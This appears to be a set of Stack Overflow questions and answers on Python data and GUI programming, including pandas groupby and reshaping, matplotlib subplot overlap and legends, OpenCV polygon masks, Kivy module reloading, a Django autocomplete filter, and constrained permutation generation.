79,555,053 | 2025-4-4 | https://stackoverflow.com/questions/79555053/group-by-and-apply-multiple-custom-functions-on-multiple-columns-in-python-panda | Consider the following dataframe example: id date hrz tenor 1 2 3 4 AAA 16/03/2010 2 6m 0.54 0.54 0.78 0.19 AAA 30/03/2010 2 6m 0.05 0.67 0.20 0.03 AAA 13/04/2010 2 6m 0.64 0.32 0.13 0.20 AAA 27/04/2010 2 6m 0.99 0.53 0.38 0.97 AAA 11/05/2010 2 6m 0.46 0.90 0.11 0.14 AAA 25/05/2010 2 6m 0.41 0.06 0.96 0.31 AAA 08/06/2010 2 6m 0.19 0.73 0.58 0.80 AAA 22/06/2010 2 6m 0.40 0.95 0.14 0.56 AAA 06/07/2010 2 6m 0.22 0.74 0.85 0.94 AAA 20/07/2010 2 6m 0.34 0.17 0.03 0.77 AAA 03/08/2010 2 6m 0.13 0.32 0.39 0.95 AAA 16/03/2010 2 1y 0.54 0.54 0.78 0.19 AAA 30/03/2010 2 1y 0.05 0.67 0.20 0.03 AAA 13/04/2010 2 1y 0.64 0.32 0.13 0.20 AAA 27/04/2010 2 1y 0.99 0.53 0.38 0.97 AAA 11/05/2010 2 1y 0.46 0.90 0.11 0.14 AAA 25/05/2010 2 1y 0.41 0.06 0.96 0.31 AAA 08/06/2010 2 1y 0.19 0.73 0.58 0.80 AAA 22/06/2010 2 1y 0.40 0.95 0.14 0.56 AAA 06/07/2010 2 1y 0.22 0.74 0.85 0.94 AAA 20/07/2010 2 1y 0.34 0.17 0.03 0.77 AAA 03/08/2010 2 1y 0.13 0.32 0.39 0.95 How can I grouby the variables id, hrz and tenor and apply the following custom functions across the dates? def ks_test(x): return scipy.stats.kstest(np.sort(x), 'uniform')[0] def cvm_test(x): n = len(x) i = np.arange(1, n + 1) x = np.sort(x) w2 = (1 / (12 * n)) + np.sum((x - ((2 * i - 1) / (2 * n))) ** 2) return w2 The desired output is the following dataframe (figure results are just examples): id hrz tenor test 1 2 3 4 AAA 2 6m ks_test 0.04 0.06 0.02 0.03 AAA 2 6m cvm_test 0.09 0.17 0.03 0.05 AAA 2 1y ks_test 0.04 0.06 0.02 0.03 AAA 2 1y cvm_test 0.09 0.17 0.03 0.05 | Use GroupBy.agg with DataFrame.stack for reshape last level of MultiIndex in columns: cols = ['id','hrz', 'tenor'] out = (df.groupby(cols)[df.columns.difference(cols + ['date'], sort=False)] .agg([ks_test, cvm_test]) .rename_axis([None, 'test'], axis=1) .stack(future_stack=True) .reset_index()) print (out) id hrz tenor test 1 2 3 4 0 AAA 2 1y ks_test 0.278182 0.166364 0.254545 0.224545 1 AAA 2 1y cvm_test 0.220803 0.044730 0.158839 0.118321 2 AAA 2 6m ks_test 0.278182 0.166364 0.254545 0.224545 3 AAA 2 6m cvm_test 0.220803 0.044730 0.158839 0.118321 How it working: print (df.groupby(cols)[df.columns.difference(cols +['date'], sort=False)] .agg([ks_test, cvm_test])) 1 2 3 \ ks_test cvm_test ks_test cvm_test ks_test cvm_test id hrz tenor AAA 2 1y 0.278182 0.220803 0.166364 0.04473 0.254545 0.158839 6m 0.278182 0.220803 0.166364 0.04473 0.254545 0.158839 4 ks_test cvm_test id hrz tenor AAA 2 1y 0.224545 0.118321 6m 0.224545 0.118321 | 1 | 2 |
79,554,664 | 2025-4-4 | https://stackoverflow.com/questions/79554664/colorbar-warning-with-pcolor-and-np-nan | I have an array with np.nan values which I want to plot using pcolor. In principle everything works, but I get a warning I cannot get rid of. Using plt.imshow does not give the warning, but I need to specify the x and y coordinates. MatplotlibDeprecationWarning: Getting the array from a PolyQuadMesh will return the full array in the future (uncompressed). To get this behavior now set the PolyQuadMesh with a 2D array .set_array(data2d). import numpy as np import matplotlib as mpl import matplotlib.pyplot as plt x = np.linspace(-2,2,100) y = np.linspace(-2,2,100) X, Y = np.meshgrid(x,y) X[X**2+Y**2>4] = np.nan Y[X**2+Y**2>4] = np.nan Z = np.exp(-(X**2+Y**2)) plt.pcolor(Y,X,Z, cmap='viridis') plt.colorbar() I use matplotlib v3.9.2 and numpy v1.26.4. | This warning is due to a change in how the internal pcolor logic is structured (changenote here). It is triggered when the colorbar code internally calls get_array on the object returned by pcolor. You can silence the warning by explicitly re-passing your Z array to the set_array method: pc = plt.pcolor(Y,X,Z, cmap='viridis') pc.set_array(Z) plt.colorbar() Alternatively, you could upgrade your Matplotlib to version 3.10+, since this deprecation is now expired. | 1 | 2 |
79,553,855 | 2025-4-3 | https://stackoverflow.com/questions/79553855/overlaping-subplots-vertically-stacked | While reading a paper for my thesis I encountered this graph (b): I've tried to recreate the second graph which is the one I would like to use for my results: import numpy as np import matplotlib.pyplot as plt from matplotlib.gridspec import GridSpec years = np.linspace(1300, 2000, 700) np.random.seed(42) delta_13C = np.cumsum(np.random.normal(0, 0.1, 700)) delta_13C = delta_13C - np.mean(delta_13C) delta_18O = np.cumsum(np.random.normal(0, 0.08, 700)) delta_18O = delta_18O - np.mean(delta_18O) temp_anomaly = np.cumsum(np.random.normal(0, 0.03, 700)) temp_anomaly = temp_anomaly - np.mean(temp_anomaly) temp_anomaly[-100:] += np.linspace(0, 1.5, 100) plt.style.use('default') plt.rcParams['font.size'] = 12 plt.rcParams['axes.linewidth'] = 1.5 plt.rcParams['axes.labelsize'] = 14 fig = plt.figure(figsize=(10, 8)) gs = GridSpec(3, 1, height_ratios=[1, 1, 1], hspace=0.2) ax1 = fig.add_subplot(gs[0]) ax1.plot(years, delta_13C, color='green', linewidth=1.0) ax1.set_ylabel('First', color='green', labelpad=10) ax1.tick_params(axis='y', colors='green') ax1.set_xlim(1300, 2000) ax1.set_ylim(-4, 4) ax1.xaxis.set_visible(False) ax1.spines['top'].set_visible(False) ax1.spines['bottom'].set_visible(False) ax1.spines['right'].set_visible(False) ax1.spines['left'].set_color('green') ax2 = fig.add_subplot(gs[1]) ax2.plot(years, delta_18O, color='blue', linewidth=1.0) ax2.yaxis.tick_right() ax2.yaxis.set_label_position("right") ax2.set_ylabel('Second', color='blue', labelpad=10) ax2.tick_params(axis='y', colors='blue') ax2.set_xlim(1300, 2000) ax2.set_ylim(-3, 3) ax2.xaxis.set_visible(False) ax2.spines['top'].set_visible(False) ax2.spines['bottom'].set_visible(False) ax2.spines['left'].set_visible(False) ax2.spines['right'].set_color('blue') ax3 = fig.add_subplot(gs[2]) ax3.plot(years, temp_anomaly, color='gray', linewidth=1.0) ax3.set_ylabel('Third', color='black', labelpad=10) ax3.set_xlim(1300, 2000) ax3.set_ylim(-1.0, 1.5) ax3.set_xlabel('Year (CE)') ax3.spines['top'].set_visible(False) ax3.spines['right'].set_visible(False) plt.show() But the result is a bit different: How can I bring the subplots closer together without blocking each other? As you can see in the graphic in the reference paper, the lines of the subplots almost touch each other. | The main change you'll need to make is to make the background color of your Axes transparent and to use a negative hspace to force the graphs to overlap a bit more: plt.rcParams['axes.facecolor'] = 'none' # transparent Axes background gs = GridSpec(3, 1, height_ratios=[1, 1, 1], hspace=-.1) # negative hspace for overlap Adjusting the y-axis on your second chart will also be necessary here since they currently clip out just a touch of data. ax2.set_ylim(-3.5, 3.5) Putting it all back into your script: import numpy as np import matplotlib.pyplot as plt from matplotlib.gridspec import GridSpec years = np.linspace(1300, 2000, 700) np.random.seed(42) delta_13C = np.cumsum(np.random.normal(0, 0.1, 700)) delta_13C = delta_13C - np.mean(delta_13C) delta_18O = np.cumsum(np.random.normal(0, 0.08, 700)) delta_18O = delta_18O - np.mean(delta_18O) temp_anomaly = np.cumsum(np.random.normal(0, 0.03, 700)) temp_anomaly = temp_anomaly - np.mean(temp_anomaly) temp_anomaly[-100:] += np.linspace(0, 1.5, 100) plt.style.use('default') plt.rcParams['font.size'] = 12 plt.rcParams['axes.linewidth'] = 1.5 plt.rcParams['axes.labelsize'] = 14 plt.rcParams['axes.facecolor'] = 'none' # make facecolor transparent fig = plt.figure(figsize=(10, 8)) gs = GridSpec(3, 1, height_ratios=[1, 1, 1], hspace=-.1) # negative hspace for overlap ax1 = fig.add_subplot(gs[0]) ax1.plot(years, delta_13C, color='green', linewidth=1.0) ax1.set_ylabel('First', color='green', labelpad=10) ax1.tick_params(axis='y', colors='green') ax1.set_xlim(1300, 2000) ax1.set_ylim(-4, 4) ax1.xaxis.set_visible(False) ax1.spines['top'].set_visible(False) ax1.spines['bottom'].set_visible(False) ax1.spines['right'].set_visible(False) ax1.spines['left'].set_color('green') ax2 = fig.add_subplot(gs[1]) ax2.plot(years, delta_18O, color='blue', linewidth=1.0) ax2.yaxis.tick_right() ax2.yaxis.set_label_position("right") ax2.set_ylabel('Second', color='blue', labelpad=10) ax2.tick_params(axis='y', colors='blue') ax2.set_xlim(1300, 2000) ax2.set_ylim(-3.5, 3.5) # changed the y-limits ever slightly since the previous clipped data ax2.xaxis.set_visible(False) ax2.spines['top'].set_visible(False) ax2.spines['bottom'].set_visible(False) ax2.spines['left'].set_visible(False) ax2.spines['right'].set_color('blue') ax3 = fig.add_subplot(gs[2]) ax3.plot(years, temp_anomaly, color='gray', linewidth=1.0) ax3.set_ylabel('Third', color='black', labelpad=10) ax3.set_xlim(1300, 2000) ax3.set_ylim(-1.0, 1.5) ax3.set_xlabel('Year (CE)') ax3.spines['top'].set_visible(False) ax3.spines['right'].set_visible(False) plt.show() Of course a touch of structure can clean up the script a bit as well: from collections import namedtuple import numpy as np import matplotlib.pyplot as plt from matplotlib.gridspec import GridSpec years = np.linspace(1300, 2000, 700) np.random.seed(42) delta_13C = np.cumsum(np.random.normal(0, 0.1, 700)) delta_13C = delta_13C - np.mean(delta_13C) delta_18O = np.cumsum(np.random.normal(0, 0.08, 700)) delta_18O = delta_18O - np.mean(delta_18O) temp_anomaly = np.cumsum(np.random.normal(0, 0.03, 700)) temp_anomaly = temp_anomaly - np.mean(temp_anomaly) temp_anomaly[-100:] += np.linspace(0, 1.5, 100) plt.style.use('default') plt.rc('font', size=12) plt.rc('axes', linewidth=1.5, labelsize=14, facecolor='none') PlotSettings = namedtuple('PlotSettings', ['data', 'linecolor', 'labelcolor', 'ylabel', 'yrange']) configurations = [ PlotSettings(delta_13C, linecolor='green', labelcolor='green', ylabel='First', yrange=(-4 , 4 )), PlotSettings(delta_18O, linecolor='blue', labelcolor='blue', ylabel='Second', yrange=(-3.5, 3.5)), PlotSettings(temp_anomaly, linecolor='gray', labelcolor='black', ylabel='Third', yrange=(-1 , 1.5)), ] fig, axes = plt.subplots( nrows=len(configurations), ncols=1, figsize=(10, 8), sharex=True, sharey=False, gridspec_kw={'hspace': -.1}, ) for i, (config, ax) in enumerate(zip(configurations, axes.flat)): ax.plot(years, config.data, color=config.linecolor, linewidth=1.0) # Format the X/Y Axes ax.set_ylabel(config.ylabel, color=config.labelcolor, labelpad=10) ax.tick_params(axis='y', colors=config.labelcolor) ax.set_ylim(*config.yrange) ax.xaxis.set_visible(False) # Format the spines ax.spines[['top', 'bottom']].set_visible(False) if (i % 2) == 0: ax.spines['right'].set_visible(False) ax.spines['left' ].set_visible(True) ax.spines['left' ].set_color(config.labelcolor) else: ax.spines['right'].set_visible(True) ax.spines['left' ].set_visible(False) ax.spines['right'].set_color(config.labelcolor) ax.yaxis.tick_right() ax.yaxis.set_label_position("right") # Make special adjustments to the bottom-most plot axes.flat[-1].spines['bottom'].set_visible(True) axes.flat[-1].xaxis.set_visible(True) axes.flat[-1].set_xlabel('Year (CE)') axes.flat[-1].set_xlim(1300, 2000) plt.show() | 2 | 2 |
79,551,690 | 2025-4-2 | https://stackoverflow.com/questions/79551690/drawing-from-opencv-fillconvexpoly-does-not-match-the-input-polygon | I'm trying to follow the solution detailed at this question to prepare a dataset to train a CRNN for HTR (Handwritten Text Recognition). I'm using eScriptorium to adjust text segmentation and transcription, exporting in ALTO format (one XML with text region coordinates for each image) and parsing the ALTO XML to grab the text image regions and export them individually to create a dataset. The problem I'm finding is that I have the region defined at eScriptorium, like this: But when I apply this code from the selected solution for the above linked question: # Initialize mask mask = np.zeros((img.shape[0], img.shape[1])) # Create mask that defines the polygon of points cv2.fillConvexPoly(mask, pts, 1) mask = mask > 0 # To convert to Boolean # Create output image (untranslated) out = np.zeros_like(img) out[mask] = img[mask] and display the image I get some parts of the text region filled: As you can see, some areas that should be inside the mask are filled and, therefore, the image pixels in them are not copied. I've made sure the pixels that make the polygon are correctly parsed and handed to OpenCV to build the mask. I can't find the reason why those areas are filled and I wonder if anyone got into a similar problem and managed to find out the reason or how to avoid it. TIA | You called cv.fillConvexPoly(). Your polygon is not convex. The algorithm assumed it to be convex and took some shortcuts to simplify the drawing code, so it came out wrong. Use cv.fillPoly() instead. That will draw non-convex polygons correctly. As you point out, the function signatures are not drop-in compatible. fillPoly() works on a list of polygons, while fillComplexPoly() just takes a single polygon. cv.fillConvexPoly(img, points, color) # would be replaced with cv.fillPoly(img, [points], color) # list of one polygon Each polygon should be a numpy array of shape (N, 1, 2) and it probably needs to be of an integer dtype too, although I'm not sure about that now and it might support floating point dtype in the future. | 2 | 2 |
79,552,738 | 2025-4-3 | https://stackoverflow.com/questions/79552738/create-a-legend-taking-into-account-both-the-size-and-color-of-a-scatter-plot | I am plotting a dataset using a scatter plot in Python, and I am encoding the data both in color and size. I'd like for the legend to represent this. I am aware of .legend_elements(prop='sizes') but I can have either colors or sizes but not both at the same time. I found a way of changing the marker color when using prop='sizes' with th color argument, but that's not really what I intend to do (they are all the same color). Here is a MWE: import pandas as pd import numpy as np import pylab as pl time = pd.DataFrame(np.random.rand(10)) intensity = pd.DataFrame(np.random.randint(1,5,10)) df = pd.concat([time, intensity], axis=1) size = intensity.apply(lambda x: 10*x**2) fig, ax = pl.subplots() scat = ax.scatter(time, intensity, c=intensity, s=size) lgd = ax.legend(*scat.legend_elements(prop="sizes", num=3, \ fmt="{x:.1f}", func=lambda s: np.sqrt(s/10)), \ title="intensity") and I'd like to have the markers color-coded too. Any help or hint would be appreciated! | Using legend_elements, you can get the size and a colour-based legend elements separately, then set the colours of the former with the latter. E.g., import pandas as pd import numpy as np import matplotlib.pyplot as pl time = pd.DataFrame(np.random.rand(10)) intensity = pd.DataFrame(np.random.randint(1,5,10)) df = pd.concat([time, intensity], axis=1) size = intensity.apply(lambda x: 10*x**2) fig, ax = pl.subplots() scat = ax.scatter(time, intensity, c=intensity, s=size) # get sized-based legend handles size_handles, text = scat.legend_elements( prop="sizes", num=3, fmt="{x:.1f}", func=lambda s: np.sqrt(s/10) ) # get colour-based legend handles colors = [c.get_color() for c in scat.legend_elements(prop="colors", num=3)[0]] # set colours of the size-based legend handles for i, c in enumerate(colors): size_handles[i].set_color(c) # add the legend lgd = ax.legend(size_handles, text, title="intensity") | 1 | 1 |
79,552,332 | 2025-4-3 | https://stackoverflow.com/questions/79552332/unloading-kivy-builder-rules-more-than-once-in-order-to-re-import-gui-elements | I would like to import optional GUI elements defined in separate Mod1.py/Mod2.py/etc files and add/remove these dynamically from the main GUI. The separate files that define these optional GUI elements, contain kv strings. In my use case, these GUI elements can be unloaded/reloaded multiple times. I discovered that if I have identically named classes in the Modx.py files, this creates cross-talk between the modules because Builder.load_string works cumulatively. The background to this discovery is here - Importing multiple modules containing identically named class in python Kivy Builder documentation suggests that a given kv string can be selectively unloaded later if a pseudo filename is supplied e.g. Builder.load_string("""<kv string>""", filename="myrule.kv") and later to unload - Builder.unload_file("myrule.kv") However when I try this, it appears to work only the first time a module is unloaded and another one is loaded. After that the optional GUI elements no longer appear when reloaded. The following example demonstrates this. from kivy.app import App from kivy.uix.boxlayout import BoxLayout from kivy.uix.floatlayout import FloatLayout from kivy.uix.button import Button from kivy.lang import Builder import importlib Builder.load_string(''' <MainWidget>: orientation: 'vertical' BoxLayout: Button: text: "Load Mod 1" on_press: root.load_module(self.text) Button: text: "Load Mod 2" on_press: root.load_module(self.text) Button: text: "Unload all" on_press: dock.clear_widgets() FloatLayout: id: dock ''') class MainWidget(BoxLayout): def load_module(self, hint): self.ids.dock.clear_widgets() Builder.unload_file("foo.kv") if "1" in hint: self.module = importlib.import_module("Mod1").Module() if "2" in hint: self.module = importlib.import_module("Mod2").Module() self.ids.dock.add_widget(self.module) class MyApp(App): def build(self): return MainWidget() if __name__ == '__main__': MyApp().run() Mod1.py from kivy.uix.floatlayout import FloatLayout from kivy.lang import Builder Builder.load_string(''' <Module>: size_hint: None, None size: self.parent.size if self.parent else self.size pos: self.parent.pos if self.parent else self.pos Button: size_hint: None, None width: self.parent.width / 3 height: self.parent.height pos: self.parent.pos text: "Mod 1" on_press: print(root); print([x for x in dir(root) if 'method' in str(x)]) ''', filename="foo.kv") class Module(FloatLayout): def __init__(self, **kwargs): super(FloatLayout, self).__init__(**kwargs) def dummymethod1(self): pass Mod2.py from kivy.uix.floatlayout import FloatLayout from kivy.lang import Builder Builder.load_string(''' <Module>: size_hint: None, None size: self.parent.size if self.parent else self.size pos: self.parent.pos if self.parent else self.pos Button: size_hint: None, None width: self.parent.width / 3 height: self.parent.height pos: (self.parent.x + self.parent.width / 2) , self.parent.y text: "Mod 2" on_press: print(root); print([x for x in dir(root) if 'method' in str(x)]) ''', filename="foo.kv") class Module(FloatLayout): def __init__(self, **kwargs): super(FloatLayout, self).__init__(**kwargs) def dummymethod2(self): pass I would like to know if there is a way to make this work properly. Perhaps I am missing something about the way Kivy builder functions? | I think the importlib will not import a module if it has already been loaded. In that case, you can use importlib.reload(). Try modifying your MainWidget class to do that. Something like: class MainWidget(BoxLayout): def __init__(self): self.current_module1 = None self.current_module2 = None super(MainWidget, self).__init__() def load_module(self, hint): self.ids.dock.clear_widgets() Builder.unload_file("foo.kv") if "1" in hint: if self.current_module1: self.current_module1 = importlib.reload(self.current_module1) else: self.current_module1 = importlib.import_module("Mod1") self.module = self.current_module1.Module() if "2" in hint: if self.current_module2: self.current_module2 = importlib.reload(self.current_module2) else: self.current_module2 = importlib.import_module("Mod2") self.module = self.current_module2.Module() self.ids.dock.add_widget(self.module) | 1 | 2 |
79,552,670 | 2025-4-3 | https://stackoverflow.com/questions/79552670/convert-a-column-containing-a-single-value-to-row-in-python-pandas | Consider the following dataframe example: maturity_date simulation simulated_price realized_price 30/06/2010 1 0.539333333 0.611 30/06/2010 2 0.544 0.611 30/06/2010 3 0.789666667 0.611 30/06/2010 4 0.190333333 0.611 30/06/2010 5 0.413666667 0.611 Apart from setting aside the value of the last column and concatenating, is there any other way to adjust the dataframe such that the last column becomes row? Here is the desired output: maturity_date simulation simulated_price 30/06/2010 1 0.539333333 30/06/2010 2 0.544 30/06/2010 3 0.789666667 30/06/2010 4 0.190333333 30/06/2010 5 0.413666667 30/06/2010 realized_price 0.611 | Maybe easier is processing dictionary from last row, DataFrame.pop trick is for remove original column realized_price: d = df.iloc[-1].to_dict() d['simulated_price'] = d.pop('realized_price') d['simulation'] = 'realized_price' df.loc[len(df.pop('realized_price'))] = d Alternative: last = df.columns[-1] d = df.iloc[-1].to_dict() d['simulated_price'] = d.pop(last) d['simulation'] = last df.loc[len(df.pop(last))] = d print (df) maturity_date simulation simulated_price 0 30/06/2010 1 0.539333 1 30/06/2010 2 0.544000 2 30/06/2010 3 0.789667 3 30/06/2010 4 0.190333 4 30/06/2010 5 0.413667 5 30/06/2010 realized_price 0.611000 Another idea is use DataFrame.loc for set new row with default index of DataFrame by select last row in DataFrame.iloc, rename and reappend simulation with new value realized_price in Series.reindex: s = (df.iloc[-1].drop(['simulated_price','simulation']) .rename({'realized_price':'simulated_price'}) .reindex(df.columns[:-1], fill_value='realized_price')) df.loc[len(df.pop('realized_price'))] = s print (df) maturity_date simulation simulated_price 0 30/06/2010 1 0.539333 1 30/06/2010 2 0.544000 2 30/06/2010 3 0.789667 3 30/06/2010 4 0.190333 4 30/06/2010 5 0.413667 5 30/06/2010 realized_price 0.611000 Alternative is first reassign column simulation, then get last row and processing Series: s = (df.assign(simulation='realized_price') .iloc[-1] .drop(['simulated_price']) .rename({'realized_price':'simulated_price'})) df.loc[len(df.pop('realized_price'))] = s print (df) maturity_date simulation simulated_price 0 30/06/2010 1 0.539333 1 30/06/2010 2 0.544000 2 30/06/2010 3 0.789667 3 30/06/2010 4 0.190333 4 30/06/2010 5 0.413667 5 30/06/2010 realized_price 0.611000 Another idea with concat: out = (pd.concat([df, df.iloc[[-1]] .assign(simulation='realized_price', simulated_price=df['realized_price'].iat[0])], ignore_index=True) .drop('realized_price', axis=1)) print (out) maturity_date simulation simulated_price 0 30/06/2010 1 0.539333 1 30/06/2010 2 0.544000 2 30/06/2010 3 0.789667 3 30/06/2010 4 0.190333 4 30/06/2010 5 0.413667 5 30/06/2010 realized_price 0.611000 | 1 | 2 |
79,552,639 | 2025-4-3 | https://stackoverflow.com/questions/79552639/django-select2-autocomplete-how-to-pass-extra-parameter-argid-to-the-view | I'm using Django with django-autocomplete-light and Select2 to create an autocomplete field. The Select2 field is dynamically added to the page when another field is selected. It fetches data from a Django autocomplete view, and everything works fine. Now, I need to filter the queryset in my autocomplete view based on an extra parameter (argId). However, I'm not sure how to pass this parameter correctly. JavaScript (Select2 Initialization) function getElement(argId) { let elementSelect = $("<select></select>"); let elementDiv = $(`<div id='element_id' style='text-align: center'></div>`); elementDiv.append(elementSelect); $(elementSelect).select2({ ajax: { url: "/myautocomplete/class", data: function (params) { return { q: params.term, // Search term arg_id: argId // Pass extra parameter }; }, processResults: function (data) { return { results: data.results // Ensure correct format }; } }, placeholder: "Element...", minimumInputLength: 3 }); return elementDiv; } Django Autocomplete View class ElementAutocomplete(LoginRequiredMixin, autocomplete.Select2QuerySetView): def get_queryset(self): qs = MyModel.objects.filter(...) I want to pass argId from JavaScript to the Django view so that the queryset is filtered accordingly. However, I am not sure if my approach is correct or how to achieve this. Appreciate any suggestions or improvements. Thanks! | Just pass them as query params /myautocomplete/class?title=title_1 and you can catch them in the class class ElementAutocomplete(LoginRequiredMixin, autocomplete.Select2QuerySetView): def get_queryset(self): title = self.request.GET.get("title") qs = MyModel.objects.all() if title is not None: qs.filter(title__icontains=title) | 1 | 1 |
79,551,904 | 2025-4-3 | https://stackoverflow.com/questions/79551904/how-to-preprocess-multivalue-attributes-in-a-dataframe | Description: Input is a CSV file CSV file contains columns of different data types: Ordinal Values, Nominal Values, Numerical Values and Multi Value For the multivalue columns. Minimum is 1, maximum is 5 values. The input is similar to this: Job Perks Insurance Benefits Online Courses; Certification Programs; Cross Training Life Insurance; Dental Insurance Leadership Development Programs; Online Courses Life Insurance; Accident Insurance Multivalue Expected Output: Job Perks_Online Courses Job Perks_Certification Programs Job Perks_Cross Training Job Perks_Leadership Development Programs Insurance Benefits_Life Insurance Insurance Benefits_Dental Insurance Insurance Benefits_Accident Insurance 1 1 1 0 1 1 0 1 0 0 1 1 0 1 How do I preprocess the CSV input and save it to a dataframe with the above expected output? I am able to preprocess nominal attributes to the expected output(sample code below), but finding it hard to convert multivalues Input: CSV Dataset: https://github.com/omnislayer/WorkDataSet/blob/main/ECP_Unedited.csv Sample Code: #For the nominal: import pandas as pd import numpy as np import dtale #Better STDOUT for dataframes nominalColumns = ["Gender", "Marital Status", "Educational Attainment", "Employment Status", "Company Bonus Structure", "Company Medical Plan Type"] multivalueColumns = ["Job Perks", "Professional Development Opportunities", "Insurance Benefits"] df = pd.read_csv('ECP_Unedited.csv') #Convert Nominal Columns newCols = pd.get_dummies(df[nominalColumns], dtype=int) df = df.drop(columns=nominalColumns) df = pd.concat([df, newCols], axis=1) dtale.show(df) #Convert Multivalue Columns #INSERT CODE HERE! | You could combine str.get_dummies, add_prefix, and pd.concat with a generator: out = pd.concat( ( df[col].str.get_dummies(sep='; ').add_prefix(f'{col}_') for col in multivalueColumns ), axis=1, ) Output: Job Perks_Certification Programs Job Perks_Cross Training Job Perks_Leadership Development Programs Job Perks_Online Courses Insurance Benefits_Accident Insurance Insurance Benefits_Dental Insurance Insurance Benefits_Life Insurance 0 1 1 0 1 0 1 1 1 0 0 1 1 1 0 1 | 3 | 3 |
79,549,771 | 2025-4-2 | https://stackoverflow.com/questions/79549771/efficiently-filter-list-of-permutations | I would like to efficiently generate a list of "valid" permutations from a given list. By way of simple example, suppose I would like to generate the permutations of [1,2,3] where 3 is in one of the first two positions. My return result would then be [[3,1,2], [3,2,1], [1,3,2],[2,3,1]] Currently, I can solve this problem by filtering each permutation in a loop. I don't need to generate all permutations as I can use a bijection from integers to a permutation, just to save on memory. In any case, this method is not really feasible once my list starts to grow - there are simply too many permutations to loop through. A more realistic example is that I would like to generate the permutations of [1,2,...20] with length 10 (20 permute 10), where my rules are something like [1,2] must appear in the first three places (in any order), [3,4] must finish in the first 5 places (in any order), and so on (for any reasonable user input). There are 6.704425728 E+11 values to check in the loop here, so really just too much. My initial thoughts are that there could be two ways to go about this: Generate only valid permutations by using the rules to generate sub-permutations, and then combine them. Somehow represent the permutations in a tree, and apply filtering down the tree. That way, if a node fails a rule, then all children of that node will also fail the rule. This would allow drastically cutting down the checking in a lot of cases (depending on the rules). Has anyone had any experience doing something like this and could provide any guidance? Or is this simply a tricky problem that requires monumental compute? | You'll need a custom solution for that, covering all the types of constraints that you could have. In your examples I can see two types of constraints: A constraint whereby all values in a given set must occur in a certain range (start, end) The size of the produced partial permutations In Python you could think of a class that manages the conditions, and continue as follows: class Condition: def __init__(self, values, start, end): self.originalset = set(values) self.currentset = set(values) self.start = start self.end = end self.stack = [] def assign_value(self, index, value): if value not in self.currentset: # can still consume all conditioned values within the condition's range? return not self.currentset or len(self.currentset) < self.end - index if index < self.start or len(self.currentset) > self.end - index: return False # occurs out of range or too many values remaining # ok self.currentset.remove(value) self.stack.append((index, value)) return True def unassign(self, index): if self.stack and self.stack[-1][0] == index: self.currentset.add(self.stack.pop()[1]) def permutations(values, conditions, size): n = len(values) perm = [] def recur(): k = len(perm) if k == size: yield perm[:] return for i in range(k, n): take = values[i] if all(condition.assign_value(k, take) for condition in conditions): perm.append(take) values[i] = values[k] yield from recur() perm.pop() values[i] = take for condition in conditions: condition.unassign(k) if size <= n: return recur() For a reduced example I took these requirements: Generate the permutations of [1,2,...8] with length 6, where [1,2] must appear in the first three places (in any order), [3,4] must finish in the first 4 places (in any order). Here is how you would run that: # input: values = list(range(1, 8)) conditions = [Condition([1,2], 0, 3), Condition([3,4], 0, 4)] size = 6 # generate and print the corresponding permutations for perm in permutations(values, conditions, size): print(perm) This outputs 72 permutations: [1, 2, 3, 4, 5, 6] [1, 2, 3, 4, 5, 7] [1, 2, 3, 4, 6, 5] [1, 2, 3, 4, 6, 7] [1, 2, 3, 4, 7, 6] [1, 2, 3, 4, 7, 5] [1, 2, 4, 3, 5, 6] [1, 2, 4, 3, 5, 7] [1, 2, 4, 3, 6, 5] [1, 2, 4, 3, 6, 7] [1, 2, 4, 3, 7, 6] [1, 2, 4, 3, 7, 5] [1, 3, 2, 4, 5, 6] [1, 3, 2, 4, 5, 7] [1, 3, 2, 4, 6, 5] [1, 3, 2, 4, 6, 7] [1, 3, 2, 4, 7, 6] [1, 3, 2, 4, 7, 5] [1, 4, 2, 3, 5, 6] [1, 4, 2, 3, 5, 7] [1, 4, 2, 3, 6, 5] [1, 4, 2, 3, 6, 7] [1, 4, 2, 3, 7, 6] [1, 4, 2, 3, 7, 5] [2, 1, 3, 4, 5, 6] [2, 1, 3, 4, 5, 7] [2, 1, 3, 4, 6, 5] [2, 1, 3, 4, 6, 7] [2, 1, 3, 4, 7, 6] [2, 1, 3, 4, 7, 5] [2, 1, 4, 3, 5, 6] [2, 1, 4, 3, 5, 7] [2, 1, 4, 3, 6, 5] [2, 1, 4, 3, 6, 7] [2, 1, 4, 3, 7, 6] [2, 1, 4, 3, 7, 5] [2, 3, 1, 4, 5, 6] [2, 3, 1, 4, 5, 7] [2, 3, 1, 4, 6, 5] [2, 3, 1, 4, 6, 7] [2, 3, 1, 4, 7, 6] [2, 3, 1, 4, 7, 5] [2, 4, 1, 3, 5, 6] [2, 4, 1, 3, 5, 7] [2, 4, 1, 3, 6, 5] [2, 4, 1, 3, 6, 7] [2, 4, 1, 3, 7, 6] [2, 4, 1, 3, 7, 5] [3, 2, 1, 4, 5, 6] [3, 2, 1, 4, 5, 7] [3, 2, 1, 4, 6, 5] [3, 2, 1, 4, 6, 7] [3, 2, 1, 4, 7, 6] [3, 2, 1, 4, 7, 5] [3, 1, 2, 4, 5, 6] [3, 1, 2, 4, 5, 7] [3, 1, 2, 4, 6, 5] [3, 1, 2, 4, 6, 7] [3, 1, 2, 4, 7, 6] [3, 1, 2, 4, 7, 5] [4, 2, 1, 3, 5, 6] [4, 2, 1, 3, 5, 7] [4, 2, 1, 3, 6, 5] [4, 2, 1, 3, 6, 7] [4, 2, 1, 3, 7, 6] [4, 2, 1, 3, 7, 5] [4, 1, 2, 3, 5, 6] [4, 1, 2, 3, 5, 7] [4, 1, 2, 3, 6, 5] [4, 1, 2, 3, 6, 7] [4, 1, 2, 3, 7, 6] [4, 1, 2, 3, 7, 5] | 3 | 5 |
